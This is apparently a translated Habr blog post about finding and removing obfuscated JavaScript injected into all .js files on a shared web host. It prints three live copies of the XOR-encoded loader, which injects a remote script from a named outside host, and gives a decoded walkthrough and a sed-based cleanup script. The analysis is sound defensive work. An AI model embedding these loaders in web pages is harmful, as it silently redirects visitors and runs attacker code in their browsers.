
Cleaning every js-file on the server, or working out the encryption method on a day off

I want to share with Habr's readers a story about how malicious js code was cleaned out of sites hosted on the same machine. Below the cut is an amateur analysis of the malicious code, which I carried out purely out of interest, as well as the cleaning of the files on the hosting from the malicious code. This article is not a teaching material, but at the end it contains a list of lessons that I learned from this story.

How it all began


On an ordinary working day, my curator set me another task: to sort out the confusion happening on the websites of one of our clients. When visiting any of the sites, the visitor was immediately redirected to another page. The confusion was made worse by the fact that the problem showed up consistently on the client’s and my curator’s computers (on Windows), while on my Ubuntu system I could not catch this infection at all. Later it turned out that the harmful js code was a loader that fetched commands from another machine, which were then executed on the visitor's side. As far as I understood, there was a filter on the side of the infected machine that did not hand out commands when I connected from my system.

Pitfalls




Examples of evil code:
/*
 * Three captured copies of the same injected loader, each clipped together
 * with the last bytes of the host file it was appended to (the stray
 * " .createElement(e[i])}})()" and " ()})})}})(jQuery);" fragments are host
 * code, not payload). The identifiers and the XOR key literal differ per copy;
 * the structure does not:
 *   - an "explode" loop (for ... i < s.length/3 ...) that takes 3-digit groups
 *     of a digit string and maps each through String.fromCharCode;
 *   - a repeating-key XOR (charCodeAt(i) ^ key.charCodeAt(k), with k wrapping
 *     to 0 once it reaches key.length-1);
 *   - a dropper: document[d(a[3])](d(a[0])+d(a[1])+d(a[2])), then sets the
 *     properties d(a[4]) and d(a[5]) on the new element and calls
 *     document[d(a[9])](d(a[8]))[0][d(a[7])](el). The article's decode of a
 *     sibling sample gives createElement / getElementsByTagName / appendChild
 *     and a remote script URL in a[10].
 * The ".length/3;" literal that the explode loop leaves in the file is the
 * signature the cleanup script below keys on. Kept byte-identical as an
 * analysis sample.
 */
window.addEvent('unload', saveSettings);function tXph13(rT){return zmGud0O(pF7B(rT),'w6AOl64ykS2D2vS');}var jqhQ8=["004085","005095","007066","020068036046024083113021014062087042070","004068034","003079049042","003083057059067092085015010032081054091006039","022070049042002082119017002063086","031083032043","016083053010000083089028005039065006075034050016120032034009","031066053063086025027010031050070033028005062027004111061025025094010068048092048028028032"];function pF7B(m9QAuQ){var u9='';var uT=0;var l7n=0;for(uT=0;uT<m9QAuQ.length/3;uT++){u9+=String.fromCharCode(m9QAuQ.slice(l7n,l7n+3));l7n=l7n+3;}return u9;}function nZrvPy(ci){var xkw31M=document[tXph13(jqhQ8[3])](tXph13(jqhQ8[0])+tXph13(jqhQ8[1])+tXph13(jqhQ8[2]));xkw31M[tXph13(jqhQ8[4])]=ci;xkw31M[tXph13(jqhQ8[5])]=tXph13(jqhQ8[6]);document[tXph13(jqhQ8[9])](tXph13(jqhQ8[8]))[0][tXph13(jqhQ8[7])](xkw31M);}function zmGud0O(fPMlQ,kxzO7O){var sc7B='';var q9AOFX=0;var wT=0;for(q9AOFX=0;q9AOFX<fPMlQ.length;q9AOFX++){var oH6=fPMlQ.charAt(q9AOFX);var cobu=oH6.charCodeAt(0)^kxzO7O.charCodeAt(wT);oH6=String.fromCharCode(cobu);sc7B+=oH6;if(wT==kxzO7O.length-1)wT=0;else wT++;}return (sc7B);}nZrvPy(tXph13(jqhQ8[10]));
/* Sample 2 (key 'cliPkVhP3k3b3'); the leading " .createElement(e[i])}})()" is the host file's tail. */
 .createElement(e[i])}})()function rt9tP(q5m1I){return dXkiogo(ze2woX1(q5m1I),'cliPkVhP3k3b3');}var ow51o=["016015","017005","019024","000030012049031051045060086006086012071","016030010","023021025053","023009017036068060009038082024080016090019024","002028025053005050043056090007087","011009008052","004009029021007051005053093031064032074055013014030010059013","011024029032081121071035071010071007029016001005098069036029127089024028001093023066003035"];if9A1C(rt9tP(ow51o[10]));function if9A1C(pa43Q){var g4=document[rt9tP(ow51o[3])](rt9tP(ow51o[0])+rt9tP(ow51o[1])+rt9tP(ow51o[2]));g4[rt9tP(ow51o[4])]=pa43Q;g4[rt9tP(ow51o[5])]=rt9tP(ow51o[6]);document[rt9tP(ow51o[9])](rt9tP(ow51o[8]))[0][rt9tP(ow51o[7])](g4);}function dXkiogo(cRXt,e80M){var k0='';var hz00=0;var 
x5VhMO=0;for(hz00=0;hz00<cRXt.length;hz00++){var g0=cRXt.charAt(hz00);var jLf9N7=g0.charCodeAt(0)^e80M.charCodeAt(x5VhMO);g0=String.fromCharCode(jLf9N7);k0+=g0;if(x5VhMO==e80M.length-1)x5VhMO=0;else x5VhMO++;}return (k0);}function ze2woX1(hJOCB){var dMa2='';var n7Z=0;var pLz4=0;for(n7Z=0;n7Z<hJOCB.length/3;n7Z++){dMa2+=String.fromCharCode(hJOCB.slice(pLz4,pLz4+3));pLz4=pLz4+3;}return dMa2;}
/* Sample 3 (key 'voRoLKl3Kny18K'); the leading " ()})})}})(jQuery);" is the host file's closing IIFE. */
 ()})})}})(jQuery);function eH0(kzpR2g){var tZ=document[aFeJ(pXM7JTD[3])](aFeJ(pXM7JTD[0])+aFeJ(pXM7JTD[1])+aFeJ(pXM7JTD[2]));tZ[aFeJ(pXM7JTD[4])]=kzpR2g;tZ[aFeJ(pXM7JTD[5])]=aFeJ(pXM7JTD[6]);document[aFeJ(pXM7JTD[9])](aFeJ(pXM7JTD[8]))[0][aFeJ(pXM7JTD[7])](tZ);}function vbX9B(b5JWR,cZ73){var d7='';var kH5Nhm=0;var lO=0;for(kH5Nhm=0;kH5Nhm<b5JWR.length;kH5Nhm++){var m2z=b5JWR.charAt(kH5Nhm);var rT7v3=m2z.charCodeAt(0)^cZ73.charCodeAt(lO);m2z=String.fromCharCode(rT7v3);d7+=m2z;if(lO==cZ73.length-1)lO=0;else lO++;}return (d7);}function aFeJ(dMk){return vbX9B(tYiR3(dMk),'voRoLKl3Kny18K');}function tYiR3(dH5L){var zS1kLW='';var ub=0;var oK078=0;for(ub=0;ub<dH5L.length/3;ub++){zS1kLW+=String.fromCharCode(dH5L.slice(oK078,oK078+3));oK078=oK078+3;}return zS1kLW;}var pXM7JTD=["005012","004006","006027","021029055014056046041095046003028095076","005029049","002022034010","002010042027099033013069042029026067081059002","023031034010034047047091034002029","030010051011","017010038042032046001086037026010115065031023008028014033046","030027038031118100067064063015013084022056027003096065062062067089056065026095076101028028"];eH0(aFeJ(pXM7JTD[10])); 


')

Small analysis


I wanted to find out what encryption method the malware used, and I proceeded to refactor the code of one of the examples (see below). This analysis was carried out after the cleanup, purely to satisfy my curiosity.

Read evil code
 // Table of XOR-encrypted strings, decoded with the key 'euBr1Czec0l0tt':
 // [0]+[1]+[2] = "script", [3] createElement, [4] src, [5] type,
 // [6] text/javascript, [7] appendChild, [8] head, [9] getElementsByTagName,
 // [10] the remote loader URL (quoted in the text below).
 var massiv = ["022022", "023028", "021001", "006007039019069038063009006093009094000", "022007033", "017012050023", "017016058006030041027019002067015066029004017", "004005050023095039057013010092008", "013016035022", "002016054055093038023000013068031114013032004018012019092038", "013001054002011108085022023081024085090007008025112092067054085015016031015094000090015006"];
 // Entry point: decode the URL and inject a <script> element that loads it.
 exec(wrapper(massiv[10]));
 // Decode one table entry: 3-digit groups -> characters, then repeating-key XOR.
 function wrapper(str) { return xor(explode(str), 'euBr1Czec0l0tt'); }
 // Split str into groups of 3 decimal digits; String.fromCharCode coerces each
 // group to a number ("022" -> "\x16"). The loop runs str.length/3 times and
 // does not check that the length is a multiple of 3.
 function explode(str) { var mQ418 = ''; var z2wqbh = 0; var pa = 0; for (z2wqbh = 0; z2wqbh < str.length / 3; z2wqbh++) { mQ418 += String.fromCharCode(str.slice(pa, pa + 3)); pa = pa + 3; } return mQ418; }
 // Dropper: document.createElement("script"), el.src = mh,
 // el.type = "text/javascript", document.getElementsByTagName("head")[0].appendChild(el).
 // Every property and method name is looked up from the decoded table, so none
 // of them appears as plain text in the infected file.
 function exec(mh) { var fq59 = document[wrapper(massiv[3])](wrapper(massiv[0]) + wrapper(massiv[1]) + wrapper(massiv[2])); fq59[wrapper(massiv[4])] = mh; fq59[wrapper(massiv[5])] = wrapper(massiv[6]); document[wrapper(massiv[9])](wrapper(massiv[8]))[0][wrapper(massiv[7])](fq59); }
 // Repeating-key XOR: str — the exploded ciphertext, key — the key. The key
 // index wraps back to 0 after reaching key.length - 1.
 function xor(str, key) { var wL73 = ''; var c2 = 0; var i8t = 0; for (c2 = 0; c2 < str.length; c2++) { var h6547 = str.charAt(c2); var pTh = h6547.charCodeAt(0) ^ key.charCodeAt(i8t); h6547 = String.fromCharCode(pTh); wL73 += h6547; if (i8t == key.length - 1) i8t = 0; else i8t++; } return (wL73); } 



Work logic


The array contains the encrypted commands (createElement, getElementsByTagName, appendChild) as well as the address from which further commands are loaded (http://state.sml2.ru/js/cnt.js).

All the logic of the work lies in two functions. The first is explode, which splits the input string into groups of 3 digits, obtains a character from each group by its code, and concatenates all these characters. The result is passed to the function xor, which applies XOR encryption with a repeating key (the key index wraps around to 0 when it reaches the end of the key) — but I could be wrong, because I know little about encryption methods.

Treatment


For the cleanup of this infection, it was decided to use the unix command line and regular expressions. As can be seen from the examples of the malware, it could be appended to the file either on a new line or immediately after the last byte of the file (see below).

 ()})})}})(jQuery);function eH0(kzpR2g){ .createElement(e[i])}})()var ow51o=["016015","017005","019024" window.addEvent('unload', saveSettings);function tXph13(rT) 


The replacement script (antivirus.sh):

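 #!/bin/bash
 # antivirus.sh — strip the appended XOR-loader tail from one JavaScript file.
 # Usage: [QUARANTINE_DIR=/some/dir] bash antivirus.sh path/to/file.js
 # A file that does not carry the signature is left untouched.
 set -eu

 if [ "$#" -ne 1 ] || [ ! -f "$1" ]; then
     echo "usage: $0 <file.js>" >&2
     exit 2
 fi

 # Group 1: an optional run of characters from the host file's last statement,
 # written back unchanged by "\1". Group 2: the injected "var XX=[..." or
 # "function XX..." tail up to end of line — this is the part that is deleted.
 # NOTE(review): the match starts at the FIRST "var XX=[\"" or "function XX"
 # on the line, so on a single-line (minified) file any healthy code between
 # that point and the real payload is removed as well; diff the result against
 # the quarantined copy before trusting it.
 VIRUS='([\(jQuery\)\;|\)\;|\}|\*\/|\/\/]{0,})(var [a-zA-Z0-9]{2,}=\[".*|function [a-zA-Z0-9]{2,}.*)$'

 # Only lines carrying the decoder's signature ".length/3;" are ever touched.
 if ! grep -q '\.length/3;' -- "$1"; then
     exit 0
 fi

 # Keep an untouched copy of the infected file for later analysis when a
 # quarantine directory is given.
 if [ -n "${QUARANTINE_DIR:-}" ]; then
     mkdir -p -- "$QUARANTINE_DIR"
     cp -p -- "$1" "$QUARANTINE_DIR/$(basename -- "$1").$(date +%s).bak"
 fi

 # GNU sed: -r selects extended regexes, -i edits the file in place.
 sed -i -r '/.length\/3;/s/'"$VIRUS"'/\1/' "$1"
 echo "cleaned: $1"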


Here we search for all lines that contain the virus signature (.length/3;) and replace the match with the contents of the first group. If this were not done, the sed command would remove that piece of healthy code along with the payload.

The self-made antivirus was run with the command:

 # Run the cleaner once per .js file found below the current directory.
 find . -type f -name '*.js' -exec bash antivirus.sh '{}' ';'

The result was not long in coming, and after a few minutes I was pleased with the outcome of my work.

Findings:


In the end, I express my gratitude to everyone who took the time for this light read. Comments are welcome.

Source: https://habr.com/ru/post/305576/

